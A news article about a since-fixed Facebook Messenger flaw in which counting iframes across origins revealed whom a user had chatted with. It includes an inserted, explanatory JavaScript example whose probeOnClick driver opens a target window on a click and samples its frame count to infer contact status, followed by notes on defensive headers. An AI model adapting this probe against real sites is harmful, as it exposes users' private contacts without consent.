A vulnerability in the web version of Facebook Messenger could have revealed the identities of the people you had chatted with on the platform.
Ron Masas, a researcher at Imperva, discovered the flaw and reported it privately to Facebook. The social network has already deployed a fix.
"I started rummaging through the Messenger web application and noticed that iframe elements dominated the user interface," Masas wrote in a blog post published Thursday. "I decided to gradually record the iframe count for as many endpoints as I could find, in order to discover interesting and detectable states."
He noticed an interesting pattern:
"When the current user has not been in contact with a specific user, the number of iframes would reach three, then always drop sharply for a few milliseconds," Masas explained. "That could let [an attacker] remotely check whether the current user has chatted with a specific person or company, which would violate those users' privacy."
An attacker could have exploited the bug simply by luring a Messenger user to a malicious site and getting them to click anywhere on the page, for example on a cute cat video.
Facebook fixed the bug by removing all iframes from the Messenger UI, Masas writes.
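To make the leak described above concrete, and to show why removing the iframes closes it, here is an added example. It is not code from the article, from Imperva or from Facebook. It relies on one browser behaviour that is well established: under the same-origin policy almost nothing on a cross-origin window is readable, but `length` (the number of child frames) is one of the few properties exposed on a cross-origin window handle, so a page that opens another site with `window.open()` can sample how many iframes that site has at each instant. The "reaches three, then drops sharply" signature is taken from Masas's description; the endpoint URL, the sampling interval, the drop threshold and the scripted frame counts below are assumptions made for the example, not measurements of Messenger.

```javascript
// Added example (not from the article, Imperva or Facebook): modelling the
// cross-origin frame-counting side channel described in the text.
//
// ASSUMPTIONS: the "climbs to 3, then drops sharply for a few milliseconds"
// signature comes from the researcher's description; the endpoint URL,
// sampling interval, the minimum drop of 2 frames that counts as "sharp",
// and the scripted traces below are placeholders chosen for illustration.

// Collapse runs of identical readings so sampling jitter does not matter:
// [0, 0, 1, 3, 3, 0, 0] -> [0, 1, 3, 0]
function transitions(trace) {
  return trace.filter((v, i) => i === 0 || v !== trace[i - 1]);
}

// Classify a trace of frame counts observed on the target window.
//   'no-contact' : count climbed to >= peak and then fell by >= minDrop (the leak)
//   'contact'    : frames were present, but no such transient was seen
//   'no-signal'  : never any child frames, which is what removing the iframes
//                  (Facebook's fix) produces: both states now look identical
function classifyTrace(trace, peak = 3, minDrop = 2) {
  const t = transitions(trace);
  if (t.every((v) => v === 0)) return 'no-signal';
  for (let i = 0; i + 1 < t.length; i++) {
    if (t[i] >= peak && t[i] - t[i + 1] >= minDrop) return 'no-contact';
  }
  return 'contact';
}

// Read `target.length` n times. In a browser `target` is the handle returned
// by window.open(); most other property reads on a cross-origin handle throw,
// but `length` is permitted, which is the whole basis of the channel.
function sampleFrameCounts(target, n) {
  const trace = [];
  for (let i = 0; i < n; i++) trace.push(Number(target.length));
  return trace;
}

// Constructed stand-in for a cross-origin window: each read of `length`
// returns the next scripted frame count, simulating the page loading.
function scriptedWindow(counts) {
  let reads = 0;
  return {
    get length() {
      return counts[Math.min(reads++, counts.length - 1)];
    },
  };
}

// Browser-only attack driver. It must be called from a click handler because
// browsers refuse window.open() without a user gesture, which is why the
// article's attacker needs the victim to "click anywhere on the page".
// endpointUrl is hypothetical; sampling is time-based because the drop the
// researcher saw lasts only a few milliseconds.
function probeOnClick(endpointUrl, intervalMs, durationMs, report) {
  const w = window.open(endpointUrl, '_blank');
  const trace = [];
  const timer = setInterval(() => trace.push(w.length), intervalMs);
  setTimeout(() => {
    clearInterval(timer);
    w.close();
    report(classifyTrace(trace));
  }, durationMs);
}

// Offline demonstration over constructed traces.
function demo() {
  return {
    noContact: classifyTrace(sampleFrameCounts(scriptedWindow([0, 1, 2, 3, 3, 0, 0, 1, 1]), 9)),
    contact: classifyTrace(sampleFrameCounts(scriptedWindow([0, 1, 1, 1, 1, 1]), 6)),
    afterFix: classifyTrace(sampleFrameCounts(scriptedWindow([0, 0, 0, 0]), 4)),
  };
}

console.log(demo()); // { noContact: 'no-contact', contact: 'contact', afterFix: 'no-signal' }
```

Two things worth noting. First, the fix Facebook chose is structural: once the page contains no iframes, `length` is constant and the classifier returns `no-signal` for every user, so there is nothing left to distinguish. Second, the statement below is right that this is a browser-level issue; today a site can also defend itself by sending `Cross-Origin-Opener-Policy: same-origin`, which severs the opener's handle so `w.length` no longer reflects the page, and `X-Frame-Options` or `frame-ancestors` for the variant that embeds the target in an iframe instead of a popup.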
In a statement to PCMag on Friday, Facebook said the issue was technically not a Messenger bug.
"The bug is a browser issue related to how browsers handle content embedded in web pages, and could affect any site, not just Messenger.com," a Facebook spokesperson said. "We had already fixed the issue on Messenger.com last year to protect our users, and made recommendations to browser vendors to prevent this type of problem."
The disclosure comes days after Facebook CEO Mark Zuckerberg laid out, earlier this week, a plan for a "privacy-focused" messaging and social networking platform. The idea may sound laughable to anyone who has followed the company's many recent privacy scandals, but Zuckerberg appears determined to prove the doubters wrong.
"I understand that many people don't think Facebook can or would even want to build this kind of privacy-focused platform, because we don't currently have a strong reputation for building privacy-protective services, and we've historically focused on tools for more open sharing," he wrote. "But we've repeatedly shown that we can evolve to build the services that people really want, including in private messaging and stories."
Editor's Note: This story was updated at 3:30 p.m. ET with the Facebook statement.